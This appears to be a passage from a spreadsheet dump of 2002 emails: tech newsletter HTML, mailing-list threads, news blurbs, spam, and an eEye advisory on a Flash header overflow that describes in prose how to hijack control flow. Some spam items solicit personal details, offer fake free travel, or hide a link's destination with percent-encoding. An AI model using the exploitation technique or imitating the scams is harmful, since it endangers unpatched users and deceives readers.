 &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUw-0p2xIGlq9S_p8qkEi9R" &gt;&lt;b&gt;Configure &amp;amp; price&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- item 6 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsK3XOA9i2FjAi_TOlRfXuR" &gt;Samsung's bright, cheap, 19-inch CRT&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The SyncMaster 950b has its bright points. This 19-inch CRT offers
 decent image quality, it doesn't cost a bundle, and a special
 highlight zone lets you select an area of your screen and ratchet
 up the brightness, making it good for images or video. For more on
 this bright idea, read our review.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzYRmRJKDENBEZdihv9KsR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfS0A8WolrZIGiR6ImOZR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;&lt;br&gt;
 &lt;p&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
         &lt;tr valign=bottom&gt;&lt;td width=75&gt;
 			&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/HEAD_MESSAGEbrds.gif" width="175" height="19" border="0" alt="CNET Message Boards"&gt;&lt;br&gt;&lt;/td&gt;
             &lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#666666"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;&lt;td bgcolor="#CCCCCC" colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
         &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width=1 height=8&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H3vm8KawWDjP2qJ13b4dR" &gt;CNET Message Boards: Computer Help is here&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 Stumped by computer hardware and software problems? Never fear;
 check out the CNET Message Boards, where quick help is just a post
 away. Join us in the Computer Help forums.
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://www.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://www.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDZiwGf7oQqYoj1cTQ4cR" &gt;Live tech help: submit your questions now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4eGFWRVQ93KjZ6eJcnZR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbkQEDdZAu7hgvo2AKenR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjv_V9YFN4JYndFK-AWlrR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTfRMqTR1okYP2r70U6iR" &gt;May Editors' Choice award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 		 &lt;br&gt;&lt;!-- End search box --&gt;
     	&lt;/td&gt;&lt;/tr&gt;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HREF='http://clickthru.online.com/Click?q=3d-oiuNzKz86TVd4S9twloEZUu5XMk3DdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6Z4KKcAijHpx8lOheMnlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH1eeI-LywvjsK-FdLP4R"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href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzoKkXOlUywq2NRJSBTeR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5OD3htKzeFOPq1FsnysR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwVKfi9xELF5vLk7KCgFZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdHyD-kFVmobF8XEDxwcdR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErJt1fbd110-kl0aSxkZcR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDKAWzrrXGugH6NQYvURR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e405&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=fc-Wpom-6wlaul04ARltpVvA0fT5sRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; "the historical record", by which you mean *human* historical record, is
 &gt; highly overrated (nigh worthless) when you are talking about geological
 &gt; timescales, even on topics with as short a timescale as climate.
 There has been a significant recent increase in global CO2 concentrations.
 The vast preponderance of the new CO2 in the atmosphere is due to human
 activity starting around the industrialization of Europe, and accelerating
 after WWII. Most scientists studying global climate change believe that
 these increased CO2 concentrations are the primary causal agent for
 increased global warming. Hence our interest in items of human time scale.
 &gt; It is worth noting that underneath the receding glaciers deposited
 &gt; during the last major ice age, they are finding substantial evidence of
 &gt; humans living in what was a nice temperate climate before the glaciers
 &gt; paved over their civilization.  The receding glaciers have turned into a
 &gt; bit of an archaeological treasure chest, as they expose artifacts buried
 &gt; in and underneath them as they shrink that have been preserved by the
 &gt; ice for thousands of years.  I don't see any compelling reason to "save
 &gt; the glaciers" anyway, particularly in light of the fact that their
 &gt; existence has always been transient.
 Most global climate change scientists would agree that temperatures in the
 past have often been much warmer than today. The point of global warming
 isn't to save the Earth -- the planet is not sentient. The point is to
 understand and potentially reduce the impact of increasing temperatures on
 global human activity.
 &gt; For anyone to insist that the current negligible fluctuations are
 &gt; anthropogenic just heaps one ridiculous assertion upon another.  I'll
 &gt; just stick with Occam's Razor for now.
 The increase in atmospheric CO2 concentration is due to human activity.
 It is generally accepted that increases in CO2 in a closed environment
 subject to solar heating retain more of that solar energy. This is the
 current best explanation for the high temperature of Venus. If the CO2
 concentration goes up globally (which it has), then theory states the earth
 should be retaining greater solar energy. This process may be slow, and may
 be difficult to monitor due to the variability of temperatures worldwide. I
 encourage you to refute any part of this causal chain linking CO2 to
 eventual increases in global energy content, part of which will be evident
 as heat.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Subject: Re: Digital radio playlists are prohibited?!
 &gt; From: James Rogers &lt;jamesr@best.com&gt;
 &gt; To: fork@spamassassin.taint.org
 &gt; Date: 25 Sep 2002 12:52:15 -0700
 &gt; 
 &gt; On Wed, 2002-09-25 at 01:19, Rohit Khare wrote:
 &gt; &gt; Anyone heard of this law before?
 &gt; 
 &gt; 
 &gt; Absolutely.  More accurately, it is part of the RIAAs "regulation" for
 &gt; broadcasting music under their auspices.  This is actually part of the
 &gt; default statutory license the RIAA is compelled to issue.  You can try
 &gt; and establish your own contract with each of the individual publishers
 &gt; in addition to the writers, but that is a Herculean undertaking in its
 &gt; own right.  The details are really gross and complicated.
 Perhaps the stations cannot publish digital playlists, but you can get
 them from www.starcd.com anyway. They use some sort of
 listening and recognition technology to identify the music played
 on over 1000 US radio stations.
 Jeff;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [VulnWatch] EEYE: Macromedia Shockwave Flash Malformed Header Overflow
</t>
  </si>
  <si>
    <t xml:space="preserve">Macromedia Shockwave Flash Malformed Header Overflow
 Release Date: August 8, 2002
 Severity:
 High (Remote Code Execution)
 Systems Affected:
 Macromedia Shockwave Flash - All Versions;
 Unix and Windows; Netscape and Internet Explorer
 Description:
 While working on some pre-release eEye Retina CHAM tools, an exploitable
 condition was discovered within the Shockwave Flash file format called SWF
 (pronounced "SWIF").
 Since this is a browser based bug, it makes it trivial to bypass firewalls
 and attack the user at his desktop. Also, application browser bugs allow you
 to target users based on the websites they visit, the newsgroups they read,
 or the mailing lists they frequent. It is a "one button" push attack, and
 using anonymous remailers or proxies for these attacks is possible.
 This vulnerability has been proven to work with all versions of Macromedia
 Flash on Windows and Unix, through IE and Netscape. It may be run wherever
 Shockwave files may be displayed or attached, including: websites, email,
 news postings, forums, Instant Messengers, and within applications utilizing
 web-browsing functionality.
 Technical Description:
 The data header is roughly made out to:
 [Flash signature][version (1)][File Length(A number of bytes too
 short)][frame size (malformed)][Frame Rate (malformed)][Frame Count
 (malformed)][Data]
 By creating a malformed header we can supply more frame data than the
 decoder is expecting. By supplying enough data we can overwrite a function
 pointer address and redirect the flow of control to a specified location as
 soon as this address is used. At the moment the overwritten address takes
 control flow, an address pointing to a portion of our data is 8 bytes back
 from the stack pointer. By using a relative jump we redirect flow into a
 "call dword ptr [esp+N]", where N is the number of bytes from the stack
 pointer. These "jump points" can be located in multiple loaded dll's. By
 creating a simple tool using the debugging API and ReadMemory, you can
 examine a process's virtual address space for useful data to help you with
 your exploitation.
 This is not to say other potentially vulnerable situations have not been
 found in Macromedia's Flash. We discovered about seventeen others before we
 ended our testing. We are working with Macromedia on these issues.
 Protection:
 Retina(R) Network Security Scanner already scans for this latest version of
 Flash on users' systems. Ensure all users within your control upgrade their
 systems.
 Vendor Status:
 Macromedia has released a patch for this vulnerability, available at:
 http://www.macromedia.com/v1/handlers/index.cfm?ID=23293&amp;Method=Full&amp;Title=M
 PSB02%2D09%20%2D%20Macromedia%20Flash%20Malformed%20Header%20Vulnerability%2
 0Issue&amp;Cache=False
 Discovery: Drew Copley
 Exploitation: Riley Hassell
 Greetings: Hacktivismo!, Centra Spike
 Copyright (c) 1998-2002 eEye Digital Security
 Permission is hereby granted for the redistribution of this alert
 electronically. It is not to be edited in any way without express consent of
 eEye. If you wish to reprint the whole or any part of this alert in any
 other medium excluding electronic medium, please e-mail alert@eEye.com for
 permission.
 Disclaimer
 The information within this paper may change without notice. Use of this
 information constitutes acceptance for use in an AS IS condition. There are
 NO warranties with regard to this information. In no event shall the author
 be liable for any damages whatsoever arising out of or in connection with
 the use or spread of this information. Any use of this information is at the
 user's own risk.
 Feedback
 Please send suggestions, updates, and comments to:
 eEye Digital Security
 http://www.eEye.com
 info@eEye.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Russell Turpin wrote:
 &gt; Adam Beberg:
 &gt; &gt;Considering 90% of the fake job posting I see are for embedded systems or
 &gt; &gt;device drivers - C still rules the world.
 &gt;
 &gt; There is a lot of C++ in the embedded world. With static object
 &gt; allocation and a few other programming techniques, performance
 &gt; differences disappear, but C++ gives a boost in development and
 &gt; maintainability.
 Agreed, not much difference there. With C it just doesnt seem as wrong to
 be crawling around in registers and things. Quite frankly you cant fit
 _that_ big of a project into a 32K ROM, so large project issues dont matter
 as much in the embedded world.
 And in the realtime space, or when you have data coming in at 2Gbit/sec
 [fibrechannel], every cycle DOES count.
 &gt; The real issue is compiler availability. Almost every embedded platform
 &gt; has C cross-compilers. Many have C++ compilers. But there is still a
 &gt; range of platforms that have the first but not the second. Or at least,
 &gt; that was the story a few years ago.
 Definately still very very true. C++ compilers are still a rarity.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: send failed on enclosed draft
</t>
  </si>
  <si>
    <t xml:space="preserve">post: illegal header line -- Date:
 post: re-format message and try again
 Message not delivered to anyone.
 ------- Unsent Draft
 To: mice@crackmice.com
 Subject: van Hoogstraten (fwd)
 Date: Tue, 23 Jul 2002 10:53:59 +0100
 From: yyyy@spamassassin.taint.org
 Anyone see the program about this guy last night?  He's a cartoon
 character -- unbelievably inhuman.
 - --j.
 - ------- Forwarded Message
 Date:    Mon, 22 Jul 2002 14:14:22 +0100
 From:    "Tim Chapman" &lt;timc@2ubh.com&gt;
 To:      zzzzteana@yahoogroups.com
 Subject: Re: [zzzzteana] van Hoogstraten verdict
 &gt;&gt; I was a bit disappointed that van Hoogstraten only got done for
 &gt;&gt; manslaughter , but then I read that the judge is considering giving him
 &gt;&gt; life anyway,
 A good time to savour again the classic Guardian interview from a couple of
 years ago -
 http://www.guardian.co.uk/g2/story/0,3604,365743,00.html
 His tenants are 'filth'. People in council houses are 'worthless and lazy'.
 Ramblers are 'nosy perverts'. Nicholas van Hoogstraten, a man who once paid
 for a hand-grenade attack on a business rival, shows Emma Brockes around his
 Sussex palace and explains why he's so keen to keep the riff-raff away
 Friday September 8, 2000
 ...
 On the way down from the roof, through the "workers' quarters" which Van
 Hoogstraten intends to fill with staff from Zimbabwe, he returns to the
 subject of peasants, expanding on the "worthless" and "lazy" majority who
 make up the council estates of this country. "You are playing up to your
 villainous image," I suggest. Van Hoogstraten looks momentarily embarrassed.
 "I'm not villainous," he mumbles. I ask if he regards the people who work
 for him in these derogatory terms, and he says no, because they work hard
 and hard labour is what distinguishes the "riff-raff" from the "elite". I
 ask him if being a person of quality is merely a matter of wealth. He says
 no, and refers to some of his wealthy neighbours, "old-moneyed bastards"
 whom he regards as being as primitive in their idleness as "those rat bags
 drawing social security."
 ...
 He was in the Bahamas when President John F Kennedy was shot, and amidst the
 public mourning, remembers being pleased. "I was glad," he says. "He was
 only in it for the ego trip." He claims similar feelings on hearing news of
 Diana's death, while returning from France on a ferry. "She made us look
 like fools," he says. "She made a mockery of the royal family."
 Van Hoogstraten's relationship with authority is riddled with
 contradictions. He says he hated Diana because she was thick, but when you
 point out that the rest of the royal family are pretty thick too, he says
 gloopily, "they are all we've got, so we have to respect them." He says he
 favours dictatorship as the best form of government, but complains that some
 of the officials he has dealt with in Mugabe's Zimbabwe are impossible
 because "the power has gone to their heads." (Mugabe himself is the most
 modest man he has ever met, he says, and he is friends with Ian Smith, who
 apart from the small matter of his hysterical racism, he finds charming).
 Margaret Thatcher is the only leader he has ever admired, because she made
 him feel "proud to be English".
 ...
 The 'van' is of course a late affectation - always an indication of a
 genuine dickhead. See also Mohamed 'al' Fayed.
 TimC
 ------- End of Unsent Draft
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
 &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem?
 &gt; 
 &gt; I'll take the blame.
 &gt; 
 &gt; The reason, I suspect, is that we're needlessly reading the .sequences file 
 &gt; multiple times because of other sequences.  I need to make the code much 
 &gt; smarter about handling that file, but first I have a few other fish to fry in 
 &gt; my rather large patch that's on it's way.
 &gt; 
 No panic,
 I'm all for cleaning things up before getting it optimized.
 A
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Remember me???
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I am a TV producer for one of the three major networks and
 I am working on a new primetime special. We're looking for a 
 special story and thought you might be able to assist.
 THIS IS NOT A SALES PITCH FOR ANYTHING! 
 I AM REALLY LOOKING FOR A GREAT STORY!
 -----------------
 PLEASE READ THIS! 
 -----------------
 Here's the type of story we are seeking;
 Are you interested in finding a long lost love from 
 your past? 
 Your first love? 
 The one that got away?
 If you are, WE MAY BE ABLE TO MAKE YOUR DREAM COME TRUE!
 (if you are not, PLEASE send this to your single friends)
 To be considered for this rare national TV opportunity, 
 you MUST;
 1. Be single and available
 2. Have a sincere interest to find a former love
 3. Be willing to share your story on NATIONAL TV
 4. Be able to travel to Los Angeles (We pay for everything)
 If this is YOU...then here's what you need to do next-
 1. Reply to this email.
 2. Tell us WHO you are looking for. 
 3. Tell us WHY you want to find him/her. (Let your feelings out)
 4. Tell us WHERE they were last time you saw them (specifics)
 5. Tell us how to reach YOU BY PHONE- HOME, WORK, CELL, email
 If we cannot reach you, we will have to move on without you!
 We only need ONE story, so if you want it to be you...
 REPLY IMMEDIATELY!
 We look forward to getting your reply...SOON!
 Good luck!
 p.s. REMEMBER TO GIVE US A WAY TO REACH YOU BY PHONE TODAY!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 26, 2002 at 11:24:30PM +0100, John Gay wrote:
 &gt; A while ago I asked what other packages I should optomize for Pentium. One 
 &gt; person answered GlibC. This got me thinking about GCC itself, so I asked on 
 &gt; another list and got a few answers, most were "don't even think about it" but 
 &gt; a few suggested GCC and one pointed me to Linux From Scratch.
 why?
 or more specifically, what do you mean?  on one hand you can optimise
 how gcc is compiled.  all that will do is make it generate the exact
 same code just a smidge faster.  and since gcc is such a memory pig,
 you'd do better to buy more ram to up your fs cache hits and to keep
 gcc's heap out of swap.
 on the other side you can look into patches to gcc that affect it's
 code generation.  um, ok, but keep in mind that compiler errors suck.
 i can't express that enough.  compilers should just work.  perfectly.
 always.  doing anything that might affect that is, in my opinion, insane.
 they're hard to trace and you'd better have a deep knowledge of what's
 going on to either report bugs to the patch developers or to fix it
 yourself.  plus my understanding is that gcc would need major changes
 to get large speed boosts on x86 chips.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</si>
  <si>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Warplane system 'could stop mid-air explosions'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8483155,1440/
 Date: Not supplied
 Airlines are facing fresh calls to fit fuel tank inerting systems, following 
 warnings from Boeing about potentially faulty fuel pumps
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Transparent token is cryptographic key
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8086489,1440/
 Date: Not supplied
 Shining a laser through a cheap, little disc can generate an immensely powerful 
 secret code - they could be used to secure credit cards
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE Travel package and Business Kit...
</t>
  </si>
  <si>
    <t xml:space="preserve">Hotels Etc. is giving away 10,000 of our $495 Travel Packages FREE, to help the USA in the promotion of the travel business. The first 10,000 customers who sign up will receive over $5000 worth of other free products.
 This includes:
                 FREE 50% off card/vouchers for all hotels in usa 
                 FREE $2,000 Las Vegas, Hawaii &amp; Orlando gift check 
                 FREE vacation certificates for Las Vegas, Hawaii and Orlando 
 As an added bonus you will receive the following:
    Free Kodak film for life coupon 
    FREE Vacation Certificate...
    Lodging for three exciting days and two fun-filled nights at your choice of one of 20 fabulous destinations including Las Vegas and Lake Tahoe, Nevada; Daytona    Beach, Florida; Cancun and  Puerto Vallarta, Mexico; Gatlinburg, Tennessee;Branson, Missouri;Honolulu, Hawaii; and many  more! ($175 Value) 
 This also comes with a free home business where you work as much as you like, whenever you like, to make your own money with your own business.
 Visit us at our website to see more info on all of these amazing oportunities.
 Do not miss out.
 Visit http://freetravel@66.46.145.35/members/travel/
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 23 Sep 2002, Gordon Mohr wrote:
 --]
 --]The best we can hope is that technological cleverness, by raising the
 --]costs of oppression or by provoking intolerable oppression, brings
 --]social liberalization sooner rather than later.
 In a very real sense we are still playing the "stone hurst man, man wears
 hide, stone dont hurt no more so now we use arrows, arrows go thru hide
 dang lets try this chain mail stuff, arrows dont go thru chain mail so now
 we try crafting long spears with chain ripping heads, hey there buddy try
 that against my plate mail, well F you and the horse you plated try doging
 a bullets, holy shit where is my kevlar, does you kevlar stop nukes..."
 game.
 In this mad mad mad mad james burkian cum chucky darwin world there is no
 rest for either the wicked or the nonwicked, there is just the ramp up to
 the Brand New Jimmiez.
 the trick I think should all be learning is not so much looking for the
 THE KILLER APP but instead to look for the "really cool app that mutates
 to meet changes"
 Bascialy give china no choise but to shoot its own head off to stop the
 music.
 bang bang ... have a nice day.
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Approved for $5000
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Learch&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#C2CA45&gt;
 &lt;div align="center"&gt;&lt;a href="http://mill.%61%66%66%69%6c%69%61%74%65%6e%65%74%74%2e%63%6f%6d/fcard/"&gt;&lt;IMG SRC="http://mill.%61%66%66%69%6c%69%61%74%65%6e%65%74%74%2e%63%6f%6d/fcard/ad/fcs_email25.jpg" WIDTH=425 HEIGHT=400 border="0"&gt;&lt;/a&gt; 
 &lt;/div&gt;
 &lt;TABLE WIDTH=425 BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center"&gt;
   &lt;TR&gt;
 				&lt;td colspan=7 align=left&gt;&lt;br&gt;
 			&lt;font color="white" size="1" face="arial"&gt;
 			Sincerely,&lt;br&gt;
 			Your New Offers Staff
 			&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason writes:
 &gt;So IMO it's the corruption that's the problem; and corruption !=
 &gt;regulation, and corruption != socialism.   Also, over-population is really
 &gt;a symptom of that.
 Without addressing the overpopulation argument, the more bureaucracy,
 the more opportunity for corruption. If a corporation is corrupt,
 there are generally, absent more government intervention,
 alternatives. With bureacracy that is more difficult; one generally
 most uproot oneself and move.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
         &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ZDNet AnchorDesk Newsletter&lt;/title&gt;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href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh9qqqwyqEsB8LE27qd4R" &gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/hd_anchor.gif" width="600" height="60" border="0"  alt="AnchorDesk Weekly"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;!--
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;
 &lt;br&gt;
       &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2766" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;br&gt;
 &lt;/td&gt;
 --&gt;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width=588 bgcolor="#ffffff"&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=588 bgcolor="#ffffff"&gt;
                         &lt;tr valign=top&gt;
                         &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td valign="top" width=550&gt;
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;&lt;br&gt;
                                 &lt;font face="Arial, Helvetica" size="-2"&gt;TUESDAY, JULY 16, 2002&lt;/font&gt;&lt;br&gt;                                                        
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="4"&gt;&lt;br&gt;
                         &lt;font face="Arial, Helvetica" size="-1"&gt;
 &lt;table width="100%" cellpadding="0" border="0" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td valign="top" width="100%"&gt;
 &lt;img src="http://www.zdnet.com/graphics/anchordesk/homepage/title/coursey_david.gif" width="548" height="17"&gt;
    &lt;table cellpadding=0 cellspacing=0 border=0 width=83 align=left&gt;
       &lt;tr valign=top&gt;
          &lt;td&gt;
              &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/authors/144.gif" alt="David Coursey" width="75" height="105" border="0"&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
 &lt;!--
    &lt;table cellpadding=0 cellspacing=0 border=0&gt;
       &lt;tr&gt;
           &lt;td bgcolor="#fff49f"&gt;
              &lt;font face="Arial, Helvetica" size="-1"&gt;
                 &lt;b&gt;&amp;nbsp;David Coursey&lt;/b&gt;
              &lt;/font&gt;
           &lt;/td&gt;
           &lt;td&gt;
              &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/trim_yellow.gif" width="23" height="15" border="0"&gt;
           &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
    &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
       &lt;tr&gt;
          &lt;td bgcolor="#fff49f"&gt;
             &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=1&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
          &lt;td&gt;
             &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=5 width=1&gt;
          &lt;/td&gt;
       &lt;/tr&gt;
    &lt;/table&gt;
 --&gt;
    &lt;br&gt;
    &lt;font size="3"&gt;&lt;b&gt;Why we're changing our publishing schedule&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 Dear Reader,
 &lt;p&gt;
 As of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays, and Fridays, instead of five days a week. The AnchorDesk Weekly newsletter will continued to be published every Friday
 &lt;p&gt;
 Why are we doing this? There are several reasons, but the most important one is giving me a chance do more than just sit behind a desk typing all day in order to meet deadlines.  I've been writing five columns a week for 18 months now, and I'd be lying to you if I didn't admit to being more than a little tired.  
 &lt;p&gt;
 Also, I've been on such a short leash that I haven't been able to travel or meet as many people as I'd like. This new schedule means I'll have more time to get out, learn more, see more products, and discover new issues or trends. So it should result in a more interesting and useful AnchorDesk for you.
 &lt;p&gt;
 Having additional time also means I will be able to work on several projects I've been assigned, including one that could bear fruit at the Consumer Electronics Show next January. More about that soon, once all the details are nailed down.
 &lt;p&gt;
 For now, the new schedule is being called a "test," which means it could turn out to be temporary--or maybe not. We'll run it through the end of the summer and see how it works. 
 &lt;p&gt;
 I appreciate your continued support of AnchorDesk. While the column will be less frequent, I will still be on &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ldb3QT23_tvVyn4IcgyR" &gt;CNET Radio&lt;/a&gt; every weekday at noon PT (or on-demand streaming anytime) and hope you will join me there.
 &lt;p&gt;
 Sincerely,
 &lt;p&gt;
 David Coursey&lt;br&gt;
 Executive Editor&lt;br&gt;
 AnchorDesk
    &lt;p&gt;
    &lt;br&gt;
    &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="8"&gt;
    &lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;
                 &lt;tr&gt;
 &lt;td bgcolor="#cccccc"&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" width="100%"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
          &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
